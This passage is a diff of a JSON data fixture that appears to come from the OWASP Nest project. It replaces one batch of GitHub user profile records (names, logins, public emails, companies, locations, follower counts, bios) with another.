"https://avatars.githubusercontent.com/u/23086761?v=4", - "company": "@TNG ", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/49242855?v=4", + "company": "", + "location": "Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 6, + "following_count": 19, + "followers_count": 8, "public_gists_count": 0, - "public_repositories_count": 4, - "created_at": "2016-10-26T21:35:00Z", - "updated_at": "2024-08-10T09:38:32Z", - "node_id": "MDQ6VXNlcjIzMDg2NzYx", + "public_repositories_count": 340, + "created_at": "2019-04-03T14:38:30Z", + "updated_at": "2024-09-16T11:58:06Z", + "node_id": "MDQ6VXNlcjQ5MjQyODU1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408728,124 +666902,124 @@ }, { "model": "github.user", - "pk": 1940, + "pk": 7240, "fields": { - "nest_created_at": "2024-09-12T00:31:05Z", - "nest_updated_at": "2024-09-12T00:31:05Z", - "name": "Andreas Mohrig", - "login": "amohrig-kn", + "nest_created_at": "2024-09-22T08:43:00.981Z", + "nest_updated_at": "2024-09-22T19:27:43.867Z", + "name": "Artem Bachevsky", + "login": "frydaykg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/41284468?v=4", - "company": "Kühne + Nagel (AG & Co.) KG", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2255519?v=4", + "company": "", + "location": "Russia", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2018-07-16T08:00:25Z", - "updated_at": "2023-06-20T07:13:36Z", - "node_id": "MDQ6VXNlcjQxMjg0NDY4", + "following_count": 4, + "followers_count": 9, + "public_gists_count": 19, + "public_repositories_count": 20, + "created_at": "2012-08-31T14:37:55Z", + "updated_at": "2024-09-21T21:18:18Z", + "node_id": "MDQ6VXNlcjIyNTU1MTk=", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1941, + "pk": 7241, "fields": { - "nest_created_at": "2024-09-12T00:31:06.221Z", - "nest_updated_at": "2024-09-12T00:34:58.013Z", + "nest_created_at": "2024-09-22T08:43:01.628Z", + "nest_updated_at": "2024-09-22T19:27:44.524Z", "name": "", - "login": "yahia20456", + "login": "daniel-beck-bot", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/73944085?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/53303753?v=4", "company": "", - "location": "", + "location": "The Matrix", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2020-11-04T12:27:45Z", - "updated_at": "2024-07-23T12:41:23Z", - "node_id": "MDQ6VXNlcjczOTQ0MDg1", - "bio": "", + "public_repositories_count": 850, + "created_at": "2019-07-25T12:44:41Z", + "updated_at": "2023-10-26T17:32:50Z", + "node_id": "MDQ6VXNlcjUzMzAzNzUz", + "bio": "This machine account is operated by @daniel-beck", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1942, + "pk": 7242, "fields": { - "nest_created_at": "2024-09-12T00:31:07.439Z", - "nest_updated_at": "2024-09-12T00:31:07.439Z", - "name": "Swapnil Singh", - "login": "SwapnilSinghs", + "nest_created_at": "2024-09-22T08:43:02.588Z", + "nest_updated_at": "2024-09-22T19:27:45.529Z", + "name": "Julien Coste", + "login": "jcoste-orange", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/42491806?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6311173?v=4", + "company": "Orange", + "location": "Rennes", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 4, "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2018-08-18T10:42:22Z", - "updated_at": "2024-05-22T08:19:48Z", - "node_id": "MDQ6VXNlcjQyNDkxODA2", - "bio": "Software Engineer | Programming Enthusiast | Love To Code\r\n\r\n", + "public_repositories_count": 11, + "created_at": "2014-01-03T13:06:28Z", + "updated_at": "2024-08-20T07:38:23Z", + "node_id": "MDQ6VXNlcjYzMTExNzM=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1943, + "pk": 7243, "fields": { - "nest_created_at": "2024-09-12T00:31:08.662Z", - "nest_updated_at": "2024-09-12T00:31:08.662Z", - "name": "Jeffrey van Norden", - "login": "vandernorth", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5212402?v=4", - "company": "", - "location": "Haarlem, Netherlands", + "nest_created_at": "2024-09-22T08:43:02.925Z", + "nest_updated_at": "2024-09-22T19:27:45.850Z", + "name": "Mark Waite", + "login": "MarkEWaite", + "email": "mark.earl.waite@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/156685?v=4", + "company": "@cloudbees ", + "location": "Loveland, CO", "collaborators_count": 0, - "following_count": 0, - "followers_count": 24, - "public_gists_count": 1, - "public_repositories_count": 23, - "created_at": "2013-08-12T09:18:28Z", - "updated_at": "2024-05-28T17:15:48Z", - "node_id": "MDQ6VXNlcjUyMTI0MDI=", - "bio": "", + "following_count": 5, + "followers_count": 223, + "public_gists_count": 30, + "public_repositories_count": 566, + "created_at": "2009-11-22T14:30:23Z", + "updated_at": "2024-09-10T22:57:19Z", + "node_id": "MDQ6VXNlcjE1NjY4NQ==", + "bio": "Community Team Manager @cloudbees , maintainer of the Jenkins git plugin & Jenkins git client plugin, husband, and father.", "is_hireable": false, - "twitter_username": "" + "twitter_username": "MarkEWaite" } }, { "model": "github.user", - "pk": 1944, + "pk": 7244, "fields": { - "nest_created_at": "2024-09-12T00:31:11.471Z", - "nest_updated_at": "2024-09-12T00:31:11.471Z", - "name": "Benedikt Kersjes", - "login": "BenediktKersjes", + "nest_created_at": "2024-09-22T08:43:03.578Z", + "nest_updated_at": "2024-09-22T19:41:59.152Z", + "name": "", + "login": "MichaelGissingNC", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7468466?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/27948276?v=4", "company": "", - "location": "", + "location": "Graz, Austria", "collaborators_count": 0, - "following_count": 9, - "followers_count": 4, - "public_gists_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 1, "public_repositories_count": 5, - "created_at": "2014-05-02T16:28:31Z", - "updated_at": "2024-06-26T06:01:05Z", - "node_id": "MDQ6VXNlcjc0Njg0NjY=", + "created_at": "2017-04-24T07:31:02Z", + "updated_at": "2023-12-01T10:20:24Z", + "node_id": "MDQ6VXNlcjI3OTQ4Mjc2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408853,49 +667027,49 @@ }, { "model": "github.user", - "pk": 1945, + "pk": 7245, "fields": { - "nest_created_at": "2024-09-12T00:31:12.682Z", - "nest_updated_at": "2024-09-12T00:31:12.682Z", - "name": "Leon Teale", - "login": "leonteale", - "email": "leonteale89@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/3170212?v=4", - "company": "IT Governance", - "location": "Lytham, Saint Anne's", + "nest_created_at": "2024-09-22T08:43:03.893Z", + "nest_updated_at": "2024-09-22T19:27:46.795Z", + "name": "Oleg Nenashev", + "login": "oleg-nenashev", + "email": "o.v.nenashev@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3000480?v=4", + "company": "@gradle, @jenkinsci, @wiremock, @testcontainers", + "location": "Neuchatel, Switzerland", "collaborators_count": 0, - "following_count": 4, - "followers_count": 119, - "public_gists_count": 1, - "public_repositories_count": 32, - "created_at": "2013-01-02T15:38:04Z", - "updated_at": "2024-06-06T08:24:45Z", - "node_id": "MDQ6VXNlcjMxNzAyMTI=", - "bio": "Senior Penetration Tester", + "following_count": 210, + "followers_count": 692, + "public_gists_count": 7, + "public_repositories_count": 388, + "created_at": "2012-12-09T09:37:58Z", + "updated_at": "2024-08-05T09:30:53Z", + "node_id": "MDQ6VXNlcjMwMDA0ODA=", + "bio": "Dev Tools hacker and community builder with HW/Embedded background. Jenkins core maintainer. CNCF/CDF Ambassador. PhD", "is_hireable": true, - "twitter_username": "leonteale" + "twitter_username": "oleg_nenashev" } }, { "model": "github.user", - "pk": 1946, + "pk": 7246, "fields": { - "nest_created_at": "2024-09-12T00:31:13.911Z", - "nest_updated_at": "2024-09-12T00:31:13.911Z", - "name": "Yesh AJ", - "login": "Yesh-AJ-006", + "nest_created_at": "2024-09-22T08:43:04.212Z", + "nest_updated_at": "2024-09-22T19:27:47.134Z", + "name": "Oliver Gondža", + "login": "olivergondza", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13846269?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/206841?v=4", + "company": "Red Hat", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2015-08-18T06:32:47Z", - "updated_at": "2023-10-29T09:51:32Z", - "node_id": "MDQ6VXNlcjEzODQ2MjY5", + "following_count": 1, + "followers_count": 29, + "public_gists_count": 24, + "public_repositories_count": 264, + "created_at": "2010-02-19T16:22:22Z", + "updated_at": "2024-06-05T13:17:35Z", + "node_id": "MDQ6VXNlcjIwNjg0MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408903,24 +667077,24 @@ }, { "model": "github.user", - "pk": 1947, + "pk": 7247, "fields": { - "nest_created_at": "2024-09-12T00:31:15.933Z", - "nest_updated_at": "2024-09-12T00:31:15.933Z", - "name": "", - "login": "Sofaobra", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/27997412?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:43:04.565Z", + "nest_updated_at": "2024-09-22T19:27:47.447Z", + "name": "Stefan Spieker", + "login": "StefanSpieker", + "email": "S.Spieker@gmx.net", + "avatar_url": "https://avatars.githubusercontent.com/u/22742658?v=4", + "company": "@schaefflergroup ", + "location": "Germany", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, + "following_count": 25, + "followers_count": 26, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2017-04-25T08:24:38Z", - "updated_at": "2023-07-11T15:29:08Z", - "node_id": "MDQ6VXNlcjI3OTk3NDEy", + "public_repositories_count": 96, + "created_at": "2016-10-10T09:33:19Z", + "updated_at": "2024-08-28T09:48:56Z", + "node_id": "MDQ6VXNlcjIyNzQyNjU4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408928,24 +667102,24 @@ }, { "model": "github.user", - "pk": 1948, + "pk": 7248, "fields": { - "nest_created_at": "2024-09-12T00:31:17.146Z", - "nest_updated_at": "2024-09-12T00:31:17.146Z", - "name": "Eric Fenderbosch", - "login": "efenderbosch-atg", + "nest_created_at": "2024-09-22T08:43:04.882Z", + "nest_updated_at": "2024-09-22T19:27:47.768Z", + "name": "Vincent Daniel", + "login": "vincentdaniel", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/135175651?v=4", - "company": "", - "location": "Akron, OH", + "avatar_url": "https://avatars.githubusercontent.com/u/829201?v=4", + "company": "Payrails", + "location": "Berlin", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2023-05-31T21:35:04Z", - "updated_at": "2024-09-05T17:50:19Z", - "node_id": "U_kgDOCA6d4w", + "followers_count": 4, + "public_gists_count": 2, + "public_repositories_count": 22, + "created_at": "2011-06-04T10:38:06Z", + "updated_at": "2024-09-12T16:59:35Z", + "node_id": "MDQ6VXNlcjgyOTIwMQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408953,24 +667127,24 @@ }, { "model": "github.user", - "pk": 1949, + "pk": 7249, "fields": { - "nest_created_at": "2024-09-12T00:31:19.564Z", - "nest_updated_at": "2024-09-12T00:31:19.564Z", + "nest_created_at": "2024-09-22T08:43:05.523Z", + "nest_updated_at": "2024-09-22T19:27:48.428Z", "name": "", - "login": "peizhenp", + "login": "wwuck", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/139523857?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/301402?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-07-14T03:24:20Z", - "updated_at": "2023-07-14T03:24:20Z", - "node_id": "U_kgDOCFD3EQ", + "public_repositories_count": 34, + "created_at": "2010-06-10T01:04:07Z", + "updated_at": "2024-09-03T06:37:10Z", + "node_id": "MDQ6VXNlcjMwMTQwMg==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -408978,24 +667152,24 @@ }, { "model": "github.user", - "pk": 1950, + "pk": 7250, "fields": { - "nest_created_at": "2024-09-12T00:31:20.821Z", - "nest_updated_at": "2024-09-12T00:31:20.821Z", - "name": "Jürgen Fast", - "login": "juergen-fast", + "nest_created_at": "2024-09-22T08:43:12.113Z", + "nest_updated_at": "2024-09-22T19:27:55.771Z", + "name": "Hans Joachim Desserud", + "login": "hansjoachim", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24269049?v=4", - "company": "@micromata", + "avatar_url": "https://avatars.githubusercontent.com/u/3002493?v=4", + "company": "", "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 6, + "following_count": 1, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2016-11-30T10:24:58Z", - "updated_at": "2024-07-29T08:27:28Z", - "node_id": "MDQ6VXNlcjI0MjY5MDQ5", + "public_repositories_count": 28, + "created_at": "2012-12-09T18:26:06Z", + "updated_at": "2023-08-13T12:27:56Z", + "node_id": "MDQ6VXNlcjMwMDI0OTM=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409003,24 +667177,24 @@ }, { "model": "github.user", - "pk": 1951, + "pk": 7251, "fields": { - "nest_created_at": "2024-09-12T00:31:22.071Z", - "nest_updated_at": "2024-09-12T00:31:22.071Z", + "nest_created_at": "2024-09-22T08:43:12.427Z", + "nest_updated_at": "2024-09-22T19:27:56.093Z", "name": "", - "login": "Jayakumar6", + "login": "colezlaw", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/95211511?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/487953?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2021-11-29T08:13:50Z", - "updated_at": "2024-08-30T04:22:09Z", - "node_id": "U_kgDOBazP9w", + "following_count": 3, + "followers_count": 6, + "public_gists_count": 7, + "public_repositories_count": 32, + "created_at": "2010-11-19T03:51:11Z", + "updated_at": "2024-09-06T11:24:36Z", + "node_id": "MDQ6VXNlcjQ4Nzk1Mw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409028,74 +667202,99 @@ }, { "model": "github.user", - "pk": 1952, + "pk": 7252, "fields": { - "nest_created_at": "2024-09-12T00:31:23.276Z", - "nest_updated_at": "2024-09-12T00:31:23.276Z", - "name": "Mandar Pimplapure", - "login": "mandarpimplapure", - "email": "mandarpimplapure@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/16802910?v=4", + "nest_created_at": "2024-09-22T08:43:12.748Z", + "nest_updated_at": "2024-09-22T19:27:56.404Z", + "name": "", + "login": "dependabot-support", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/112581971?v=4", "company": "", - "location": "INDIA", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2016-01-20T16:45:54Z", - "updated_at": "2024-08-08T05:55:07Z", - "node_id": "MDQ6VXNlcjE2ODAyOTEw", - "bio": "", + "public_repositories_count": 0, + "created_at": "2022-08-31T19:02:16Z", + "updated_at": "2022-08-31T19:06:41Z", + "node_id": "U_kgDOBrXdUw", + "bio": "Please see GitHub Support for any Dependabot questions.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1953, + "pk": 7253, "fields": { - "nest_created_at": "2024-09-12T00:31:24.461Z", - "nest_updated_at": "2024-09-12T00:31:24.461Z", - "name": "", - "login": "jowko", + "nest_created_at": "2024-09-22T08:43:14.691Z", + "nest_updated_at": "2024-09-22T19:27:58.334Z", + "name": "Brian Fox", + "login": "brianf", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20277750?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/64264?v=4", + "company": "@sonatype ", + "location": "NH, USA", "collaborators_count": 0, "following_count": 1, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 7, - "created_at": "2016-07-04T07:37:48Z", - "updated_at": "2024-08-12T11:31:56Z", - "node_id": "MDQ6VXNlcjIwMjc3NzUw", - "bio": "", + "followers_count": 34, + "public_gists_count": 10, + "public_repositories_count": 8, + "created_at": "2009-03-17T13:26:55Z", + "updated_at": "2024-09-13T11:29:04Z", + "node_id": "MDQ6VXNlcjY0MjY0", + "bio": "CTO at @sonatype", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1954, + "pk": 7254, "fields": { - "nest_created_at": "2024-09-12T00:31:25.727Z", - "nest_updated_at": "2024-09-12T00:31:25.727Z", - "name": "ewilansky", - "login": "ewilansky", - "email": "ewilansky@yahoo.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1431556?v=4", + "nest_created_at": "2024-09-22T08:43:16.672Z", + "nest_updated_at": "2024-09-22T19:28:00.305Z", + "name": "Jan Papenbrock", + "login": "janpapenbrock", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2108728?v=4", + "company": "@edyoucated ", + "location": "Cologne, Germany, Europe", + "collaborators_count": 0, + "following_count": 33, + "followers_count": 22, + "public_gists_count": 13, + "public_repositories_count": 46, + "created_at": "2012-08-07T08:23:36Z", + "updated_at": "2024-06-19T07:52:30Z", + "node_id": "MDQ6VXNlcjIxMDg3Mjg=", + "bio": "Co-founder @edyoucated", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7255, + "fields": { + "nest_created_at": "2024-09-22T08:43:16.987Z", + "nest_updated_at": "2024-09-22T19:28:00.614Z", + "name": "Marc", + "login": "mroedder-d7", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/129860311?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 3, - "followers_count": 3, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2012-02-12T20:36:28Z", - "updated_at": "2024-05-23T01:59:11Z", - "node_id": "MDQ6VXNlcjE0MzE1NTY=", + "public_repositories_count": 1, + "created_at": "2023-04-04T12:17:18Z", + "updated_at": "2024-04-19T10:10:44Z", + "node_id": "U_kgDOB72C1w", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409103,24 +667302,24 @@ }, { "model": "github.user", - "pk": 1955, + "pk": 7256, "fields": { - "nest_created_at": "2024-09-12T00:31:27.368Z", - "nest_updated_at": "2024-09-12T00:31:27.368Z", - "name": "", - "login": "akash-onedealerlane", + "nest_created_at": "2024-09-22T08:43:17.652Z", + "nest_updated_at": "2024-09-22T19:28:01.244Z", + "name": "Misael Bustamante", + "login": "MisaelBustamante", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/129958569?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/16970023?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-04-05T12:06:34Z", - "updated_at": "2024-03-05T07:03:19Z", - "node_id": "U_kgDOB78CqQ", + "public_repositories_count": 5, + "created_at": "2016-01-30T06:46:25Z", + "updated_at": "2022-07-28T21:40:57Z", + "node_id": "MDQ6VXNlcjE2OTcwMDIz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409128,24 +667327,49 @@ }, { "model": "github.user", - "pk": 1956, + "pk": 7257, "fields": { - "nest_created_at": "2024-09-12T00:31:28.637Z", - "nest_updated_at": "2024-09-12T00:31:28.637Z", - "name": "Tristan Dyer", - "login": "trdyer", - "email": "tristandyer@hotmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6180917?v=4", + "nest_created_at": "2024-09-22T08:43:17.970Z", + "nest_updated_at": "2024-09-22T19:28:01.564Z", + "name": "Phillip Whittlesea-Clark", + "login": "pwhittlesea", + "email": "pw.github@thega.me.uk", + "avatar_url": "https://avatars.githubusercontent.com/u/1096448?v=4", + "company": "Cirium", + "location": "Southampton", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 24, + "public_gists_count": 6, + "public_repositories_count": 49, + "created_at": "2011-10-02T12:33:08Z", + "updated_at": "2024-09-13T22:06:41Z", + "node_id": "MDQ6VXNlcjEwOTY0NDg=", + "bio": "Software Architect", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7258, + "fields": { + "nest_created_at": "2024-09-22T08:43:18.287Z", + "nest_updated_at": "2024-09-22T19:28:01.890Z", + "name": "Shawn Thompson", + "login": "ssthom", + "email": "ssthomps@us.ibm.com", + "avatar_url": "https://avatars.githubusercontent.com/u/23663785?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 3, - "public_repositories_count": 9, - "created_at": "2013-12-13T19:37:06Z", - "updated_at": "2024-07-15T13:36:31Z", - "node_id": "MDQ6VXNlcjYxODA5MTc=", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2016-11-22T18:33:56Z", + "updated_at": "2024-02-26T11:53:20Z", + "node_id": "MDQ6VXNlcjIzNjYzNzg1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409153,49 +667377,49 @@ }, { "model": "github.user", - "pk": 1957, + "pk": 7259, "fields": { - "nest_created_at": "2024-09-12T00:31:29.931Z", - "nest_updated_at": "2024-09-12T00:31:29.931Z", - "name": "Stefan Kip", - "login": "kipusoep", + "nest_created_at": "2024-09-22T08:43:18.605Z", + "nest_updated_at": "2024-09-22T19:28:02.225Z", + "name": "Stephen", + "login": "stephengroat", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1866549?v=4", - "company": "WasteVision", - "location": "The Netherlands", + "avatar_url": "https://avatars.githubusercontent.com/u/1159138?v=4", + "company": "@DataDog", + "location": "Different Places", "collaborators_count": 0, - "following_count": 0, - "followers_count": 17, - "public_gists_count": 5, - "public_repositories_count": 34, - "created_at": "2012-06-19T08:13:09Z", - "updated_at": "2024-09-09T08:20:04Z", - "node_id": "MDQ6VXNlcjE4NjY1NDk=", - "bio": "Webdeveloper, back-end minded. Love .NET, MVC, C# and DevOps. MCSA Web Applications, Umbraco Certified Expert, Sitecore 8 certified. Dad of Lani and Bodi.", - "is_hireable": false, - "twitter_username": "kipusoep" + "following_count": 10, + "followers_count": 93, + "public_gists_count": 4, + "public_repositories_count": 251, + "created_at": "2011-10-29T05:17:36Z", + "updated_at": "2024-09-22T11:07:44Z", + "node_id": "MDQ6VXNlcjExNTkxMzg=", + "bio": "Focused on security, IPv6, and sunny days", + "is_hireable": true, + "twitter_username": "stephengroat" } }, { "model": "github.user", - "pk": 1958, + "pk": 7260, "fields": { - "nest_created_at": "2024-09-12T00:31:31.140Z", - "nest_updated_at": "2024-09-12T00:31:31.140Z", - "name": "Louis", - "login": "ESPLouis", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/117521562?v=4", + "nest_created_at": "2024-09-22T08:43:18.921Z", + "nest_updated_at": "2024-09-22T19:28:02.555Z", + "name": "Prakhash Sivakumar", + "login": "Prakhash", + "email": "prakhashsiva21@gmaill.com", + "avatar_url": "https://avatars.githubusercontent.com/u/4003151?v=4", "company": "", - "location": "", + "location": "Colombo, Sri Lanka", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-11-05T12:54:59Z", - "updated_at": "2024-04-07T19:47:42Z", - "node_id": "U_kgDOBwE8mg", + "following_count": 1, + "followers_count": 3, + "public_gists_count": 54, + "public_repositories_count": 69, + "created_at": "2013-03-29T06:38:43Z", + "updated_at": "2024-09-12T13:32:26Z", + "node_id": "MDQ6VXNlcjQwMDMxNTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409203,24 +667427,24 @@ }, { "model": "github.user", - "pk": 1959, + "pk": 7261, "fields": { - "nest_created_at": "2024-09-12T00:31:32.726Z", - "nest_updated_at": "2024-09-12T00:31:32.726Z", - "name": "", - "login": "karthickm512", + "nest_created_at": "2024-09-22T08:43:19.238Z", + "nest_updated_at": "2024-09-22T19:28:02.913Z", + "name": "Akhilesh Tyagi", + "login": "tyagiakhilesh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/68647169?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1140597?v=4", "company": "", - "location": "", + "location": "Bangalore, India", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2020-07-22T12:36:03Z", - "updated_at": "2024-07-09T07:01:26Z", - "node_id": "MDQ6VXNlcjY4NjQ3MTY5", + "following_count": 1, + "followers_count": 3, + "public_gists_count": 42, + "public_repositories_count": 62, + "created_at": "2011-10-20T11:51:54Z", + "updated_at": "2024-03-05T09:57:21Z", + "node_id": "MDQ6VXNlcjExNDA1OTc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409228,49 +667452,49 @@ }, { "model": "github.user", - "pk": 1960, + "pk": 7262, "fields": { - "nest_created_at": "2024-09-12T00:31:33.959Z", - "nest_updated_at": "2024-09-12T00:31:33.959Z", - "name": "Christoph", - "login": "chrisrueger", + "nest_created_at": "2024-09-22T08:43:19.871Z", + "nest_updated_at": "2024-09-22T19:28:03.554Z", + "name": "Zhe Sun", + "login": "ZheSun88", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/188422?v=4", - "company": "Synesty GmbH", - "location": "Jena", + "avatar_url": "https://avatars.githubusercontent.com/u/31067185?v=4", + "company": "vaadin Oy", + "location": "Turku, Finland", "collaborators_count": 0, - "following_count": 16, - "followers_count": 1, - "public_gists_count": 2, - "public_repositories_count": 15, - "created_at": "2010-01-23T18:10:38Z", - "updated_at": "2024-09-11T23:52:07Z", - "node_id": "MDQ6VXNlcjE4ODQyMg==", - "bio": "Coder, musician and founder of synesty.com a cloud-app for connecting different APIs and apps.", + "following_count": 21, + "followers_count": 16, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2017-08-16T11:26:51Z", + "updated_at": "2024-08-16T06:46:32Z", + "node_id": "MDQ6VXNlcjMxMDY3MTg1", + "bio": "Hi, DeVeLoPeR, i am getting there", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1961, + "pk": 7263, "fields": { - "nest_created_at": "2024-09-12T00:31:35.177Z", - "nest_updated_at": "2024-09-12T00:31:35.177Z", - "name": "Pascal Obrist", - "login": "obristp", + "nest_created_at": "2024-09-22T08:43:20.189Z", + "nest_updated_at": "2024-09-22T19:28:03.872Z", + "name": "Daniel Oliver Guba", + "login": "gudaolLMI", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/19670247?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/57671951?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2016-05-31T15:20:28Z", - "updated_at": "2024-09-05T13:06:57Z", - "node_id": "MDQ6VXNlcjE5NjcwMjQ3", + "public_repositories_count": 1, + "created_at": "2019-11-12T13:49:33Z", + "updated_at": "2024-08-29T12:17:35Z", + "node_id": "MDQ6VXNlcjU3NjcxOTUx", "bio": "", "is_hireable": false, "twitter_username": "" @@ -409278,49 +667502,49 @@ }, { "model": "github.user", - "pk": 1962, + "pk": 7264, "fields": { - "nest_created_at": "2024-09-12T00:31:36.427Z", - "nest_updated_at": "2024-09-12T00:31:36.427Z", - "name": "", - "login": "jonatiao", + "nest_created_at": "2024-09-22T08:43:21.158Z", + "nest_updated_at": "2024-09-22T19:28:04.849Z", + "name": "Jorge Mendes", + "login": "tx2", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20508631?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7208209?v=4", "company": "", - "location": "", + "location": "Lisbon", "collaborators_count": 0, "following_count": 0, - "followers_count": 4, + "followers_count": 1, "public_gists_count": 0, "public_repositories_count": 11, - "created_at": "2016-07-18T02:46:27Z", - "updated_at": "2024-04-26T13:04:43Z", - "node_id": "MDQ6VXNlcjIwNTA4NjMx", + "created_at": "2014-04-07T14:49:22Z", + "updated_at": "2022-05-10T16:18:39Z", + "node_id": "MDQ6VXNlcjcyMDgyMDk=", "bio": "", - "is_hireable": false, - "twitter_username": "" + "is_hireable": true, + "twitter_username": "Jorzze" } }, { "model": "github.user", - "pk": 1963, + "pk": 7265, "fields": { - "nest_created_at": "2024-09-12T00:31:37.655Z", - "nest_updated_at": "2024-09-12T00:31:38.878Z", - "name": "Uwe", - "login": "Uwinator", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16160551?v=4", + "nest_created_at": "2024-09-22T08:43:21.795Z", + "nest_updated_at": "2024-09-22T19:28:05.483Z", + "name": "Anupam Juniwal", + "login": "AnupamJuniwal", + "email": "ajuniwal@newrelic.com", + "avatar_url": "https://avatars.githubusercontent.com/u/28787022?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2015-12-05T01:37:18Z", - "updated_at": "2024-08-27T15:20:26Z", - "node_id": 